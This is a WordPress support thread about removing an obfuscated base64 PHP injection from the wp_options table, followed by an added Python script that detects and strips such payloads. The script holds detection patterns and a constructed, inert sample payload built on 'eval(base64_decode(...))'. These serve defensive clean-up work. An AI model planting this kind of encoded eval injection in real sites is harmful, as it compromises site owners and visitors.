Support » Fixing WordPress » How to Eliminate Malicious Code from Database

  • Resolved dworsky (@dworsky)


    Through some security flaw, malicious code was entered into my database. Apparently it is obfuscated php code that adds drug-related text in the BEGIN TITLE HEAD BAR section of my index template.

    I know nothing about editing a SQL database and do not know how to use phpMyAdmin. Could someone kindly walk me through, step by step, how to get rid of this offending code without screwing up everything?

    Here is what my hosting company said:

    The code isn’t part of your scripts; it’s contained in your WordPress database under the wp_options table. The row with option_id “78”, option_name “blog_headers”, contains the bad code showing on your site. Your theme displays this code with this:

    <?php $wp_headers() ?>

    You’ll notice a long string of numbers/letters in the above mentioned database field, specifically:


    The above is base64 encoded; if you use a decoder you can see the bad code your site is executing at this point. For simplicity’s sake I have included a web-page-based encoder/decoder, so you can just copy & paste the above string and click decode at the site below:

    http://makcoder.sourceforge.net/demo/base64.php

    You’ll then see the code your site is executing, which is actually PHP code.
    =========

    Thanks in advance.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Knowing how to use phpMyAdmin is a valuable skill. Take a look at this article, phpMyAdmin Tutorial, for an introduction to the subject.

    Then read Podz’ article on changing the site-url.

    At that point you have an idea on how you edit a record (row) in wp_options. Now just find the rows you need to delete in wp_options and instead of clicking on the Edit icon, click on the Delete icon (big red X).

    Also, remember you should always have a database backup before attempting direct changes to your database so please review and follow the instructions in Backing_Up_Your_Database.

    Michael,

    Thanks for your help.

    I actually figured out how to edit the offending code out and did not delete the entry because it was needed for the real header.

    Edgar
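The clean-up the thread describes (a base64 string inside a wp_options value, which the hosting company decoded to PHP, and which Edgar edited out while keeping the legitimate header) can be checked mechanically before anyone touches the row in phpMyAdmin. The following is an added example, not code from the thread or from WordPress: it scans constructed `(option_id, option_name, option_value)` rows for long base64 runs that decode to PHP markers, and strips only those runs so the real header content survives. The sample rows and payload are constructed here, not taken from the thread.

```python
import base64
import binascii
import re

# Markers that, once a base64 run is decoded, indicate executable PHP rather than header markup.
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode(")

# Base64 runs of 40+ characters; short tokens (plugin slugs, words) are ignored.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decoded_php_marker(token):
    """Return the first PHP marker found in the decoded token, or None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    for marker in PHP_MARKERS:
        if marker in raw:
            return marker.decode()
    return None

def find_suspicious(rows):
    """Scan (option_id, option_name, option_value) rows; report rows carrying PHP."""
    hits = []
    for option_id, option_name, option_value in rows:
        for token in B64_RUN.findall(option_value):
            marker = decoded_php_marker(token)
            if marker:
                hits.append((option_id, option_name, marker))
                break
    return hits

def strip_payload(option_value):
    """Remove only the base64 runs that decode to PHP; keep legitimate content."""
    return B64_RUN.sub(
        lambda m: "" if decoded_php_marker(m.group(0)) else m.group(0),
        option_value)

# Constructed sample rows; the payload decodes to inert PHP markers, not the thread's string.
INJECTED = base64.b64encode(b"?><?php\n\teval(base64_decode($x));\n?>").decode()
LEGIT_HEADER = '<meta name="generator" content="WordPress" />'
SAMPLE_ROWS = [
    (1, "siteurl", "http://example.com"),
    (2, "active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}'),
    (3, "harmless_blob", base64.b64encode(b"plain text, long enough to look like a payload but not PHP").decode()),
    (78, "blog_headers", LEGIT_HEADER + INJECTED),
]
```

Run `find_suspicious` over a full `SELECT option_id, option_name, option_value FROM wp_options` export; a long base64 value that decodes to something other than PHP (row 3 above) is not flagged, and the cleaned value from `strip_payload` is what you would paste back into the row after taking the backup the reply above insists on.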

  • The topic ‘How to Eliminate Malicious Code from Database’ is closed to new replies.